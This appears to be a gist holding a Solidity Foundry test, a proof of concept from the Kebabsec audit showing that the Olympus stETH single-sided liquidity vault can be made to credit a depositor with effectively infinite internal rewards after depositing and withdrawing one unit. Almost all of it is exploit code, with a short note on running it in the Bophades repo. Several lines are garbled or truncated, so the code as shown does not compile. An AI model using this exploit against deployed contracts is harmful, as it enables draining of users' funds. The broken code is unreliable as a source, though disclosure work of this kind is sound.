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Created February 3, 2023 14:43
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Kebabsec SSLV Infinite Rewards PoC
// SPDX-License-Identifier: Unlicense
pragma solidity 0.8.15;
import {Test, stdError} from "forge-std/Test.sol";
import "forge-std/console.sol";
import {UserFactory} from "test/lib/UserFactory.sol";
import {FullMath} from "libraries/FullMath.sol";
import {MockERC20, ERC20} from "solmate/test/utils/mocks/MockERC20.sol";
import {MockPriceFeed} from "test/mocks/MockPriceFeed.sol";
import {MockBalancerPool} from "test/mocks/BalancerMocks.sol";
import {MockAuraBooster, MockAuraRewardPool} from "test/mocks/AuraMocks.sol";
import {JoinPoolRequest, ExitPoolRequest} from "policies/lending/interfaces/IBalancer.sol";
import {IAuraBooster, IAuraRewardPool} from "policies/lending/interfaces/IAura.sol";
import {OlympusMinter, OHM} from "modules/MINTR/OlympusMinter.sol";
import {OlympusLiquidityRegistry} from "modules/LQREG/OlympusLiquidityRegistry.sol";
import {OlympusRoles, ROLESv1} from "modules/ROLES/OlympusRoles.sol";
import {RolesAdmin} from "policies/RolesAdmin.sol";
import {StethLiquidityVault} from "policies/lending/StethLiquidityVault.sol";
import "src/Kernel.sol";
contract MockOhm is ERC20 {
string memory _name,
string memory _symbol,
uint8 _decimals
) ERC20(_name, _symbol, _decimals) {}
function mint(address to, uint256 value) public virtual {
_mint(to, value);
function burnFrom(address from, uint256 value) public virtual {
_burn(from, value);
// MockVault is modified so that it gives LP tokens in a not constant 1e18 amount but as equal to stETH amount provided
contract MockVault {
MockERC20 public bpt;
address public token0;
address public token1;
uint256 public token0Amount;
uint256 public token1Amount;
address bpt_,
address token0_,
address token1_
) {
bpt = MockERC20(bpt_);
token0 = token0_;
token1 = token1_;
function joinPool(
bytes32 poolId,
address sender,
address recipient,
JoinPoolRequest calldata request
) external {
ERC20(request.assets[0]).transferFrom(sender, address(this), request.maxAmountsIn[0]);
ERC20(request.assets[1]).transferFrom(sender, address(this), request.maxAmountsIn[1]);, request.maxAmountsIn[1]); // THIS LINE IS CHANGED
function exitPool(
bytes32 poolId,
address sender,
address recipient,
ExitPoolRequest calldata request
) external {
(, uint256 bptAmount) = abi.decode(request.userData, (uint256, uint256));
bpt.burn(sender, bptAmount);
function getPoolTokens(bytes32 poolId)
returns (
address[] memory,
uint256[] memory,
address[] memory tokens = new address[](2);
tokens[0] = token0;
tokens[1] = token1;
uint256[] memory balances = new uint256[](2);
balances[0] = token0Amount;
balances[1] = token1Amount;
return (tokens, balances, block.timestamp);
function setPoolAmounts(uint256 token0Amount_, uint256 token1Amount_) external {
token0Amount = token0Amount_;
token1Amount = token1Amount_;
// solhint-disable-next-line max-states-count
contract KebabsecTest is Test {
using FullMath for uint256;
UserFactory public userCreator;
address internal alice;
address public godmode;
MockOhm internal ohm;
MockERC20 internal steth;
MockERC20 internal reward;
MockERC20 internal reward2;
MockERC20 internal externalReward;
MockPriceFeed internal ohmEthPriceFeed;
MockPriceFeed internal ethUsdPriceFeed;
MockPriceFeed internal stethUsdPriceFeed;
MockVault internal vault;
MockBalancerPool internal liquidityPool;
MockAuraBooster internal booster;
MockAuraRewardPool internal auraPool;
Kernel internal kernel;
OlympusMinter internal minter;
OlympusLiquidityRegistry internal lqreg;
OlympusRoles internal roles;
RolesAdmin internal rolesAdmin;
StethLiquidityVault internal liquidityVault;
uint256 internal constant STETH_AMOUNT = 1e18;
uint256[] internal minTokenAmounts_ = [100e9, 1e18];
uint256[] internal kebabAmounts_ = [0];
function setUp() public {
vm.warp(51 * 365 * 24 * 60 * 60); // Set timestamp at roughly Jan 1, 2021 (51 years since Unix epoch)
// Deploy mock users
userCreator = new UserFactory();
address[] memory users = userCreator.create(1);
alice = users[0];
// Deploy mock tokens
ohm = new MockOhm("Olympus", "OHM", 9);
steth = new MockERC20("Staked ETH", "stETH", 18);
reward = new MockERC20("Reward Token", "REWARD", 18);
reward2 = new MockERC20("Reward Token 2", "REWARD2", 18);
externalReward = new MockERC20("External Reward Token", "EXTREWARD", 18);
// Deploy mock price feeds
ohmEthPriceFeed = new MockPriceFeed();
ethUsdPriceFeed = new MockPriceFeed();
stethUsdPriceFeed = new MockPriceFeed();
ohmEthPriceFeed.setLatestAnswer(1e16); // 0.01 ETH
ethUsdPriceFeed.setLatestAnswer(1000e8); // 1000 USD
stethUsdPriceFeed.setLatestAnswer(1000e18); // 1000 USD
// Deploy mock Balancer contracts
liquidityPool = new MockBalancerPool();
vault = new MockVault(address(liquidityPool), address(ohm), address(steth));
vault.setPoolAmounts(100e9, 1e18);
// Deploy mock Aura contracts
auraPool = new MockAuraRewardPool(address(vault.bpt()), address(externalReward));
booster = new MockAuraBooster(address(vault.bpt()), address(auraPool));
// Deploy kernel
kernel = new Kernel();
// Deploy modules
minter = new OlympusMinter(kernel, address(ohm));
lqreg = new OlympusLiquidityRegistry(kernel);
roles = new OlympusRoles(kernel);
// Deploy roles admin
rolesAdmin = new RolesAdmin(kernel);
StethLiquidityVault.OracleFeed memory ohmEthFeedStruct = StethLiquidityVault
.OracleFeed({feed: ohmEthPriceFeed, updateThreshold: 1 days});
StethLiquidityVault.OracleFeed memory ethUsdFeedStruct = StethLiquidityVault
.OracleFeed({feed: ethUsdPriceFeed, updateThreshold: 1 days});
StethLiquidityVault.OracleFeed memory stethUsdFeedStruct = StethLiquidityVault
.OracleFeed({feed: stethUsdPriceFeed, updateThreshold: 1 days});
StethLiquidityVault.AuraPool memory auraPoolStruct = StethLiquidityVault.AuraPool({
pid: 0,
booster: IAuraBooster(booster),
rewardsPool: IAuraRewardPool(auraPool)
// Deploy stETH Single Sided Liquidity Vault
liquidityVault = new StethLiquidityVault(
// Initialize system and kernel
// Initialize modules
kernel.executeAction(Actions.InstallModule, address(minter));
kernel.executeAction(Actions.InstallModule, address(lqreg));
kernel.executeAction(Actions.InstallModule, address(roles));
// Approve policies
kernel.executeAction(Actions.ActivatePolicy, address(rolesAdmin));
kernel.executeAction(Actions.ActivatePolicy, address(liquidityVault));
// Set roles
rolesAdmin.grantRole("liquidityvault_admin", address(this));
// Set limit
liquidityVault.setLimit(100000e9); // 1000 OHM
// Set price variation threshold to 10%
// Add reward token
liquidityVault.addInternalRewardToken(address(reward), 1e18, block.timestamp); // 1 REWARD token per second
liquidityVault.addExternalRewardToken(address(externalReward));, 1e23);
/// Initialize timestamps on mock price feeds
// Mint stETH to alice, STETH_AMOUNT * 100);
// Approve vault to spend alice's stETH
steth.approve(address(liquidityVault), STETH_AMOUNT * 100);
function _withdrawSetUpKebab() internal {
liquidityVault.deposit(STETH_AMOUNT * 100, 100e18);
vm.warp(block.timestamp + 10); // Increase time 10 seconds so there are rewards
function testCorrectness_kebabsecInfiniteRewards(address user_) public {
vm.assume(user_ != address(0) && user_ != alice && user_ != address(liquidityVault));
// Setup
// Add second depositor
vm.startPrank(user_);, 1e18);
steth.approve(address(liquidityVault), 1e18);
liquidityVault.deposit(1e18, 1e18);
liquidityVault.withdraw(1, kebabAmounts_, false);
console.log(liquidityVault.internalRewardsForToken(0, user_));
assertEq(liquidityVault.internalRewardsForToken(0, user_), type(uint256).max);
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Balancer mock vault is slightly modified so that it returns LP tokens not in constant 1e18 amount but in an equal amount to the stETH provided, which works as a better approximation for PoC purposes.
To run the test, just copy this file to the test folder in Bophades repo.
Test itself is modified from the original test file in repo, with the difference being the OHM minting limit is increased and alice mints more in the withdraw setup so that the PoC works.

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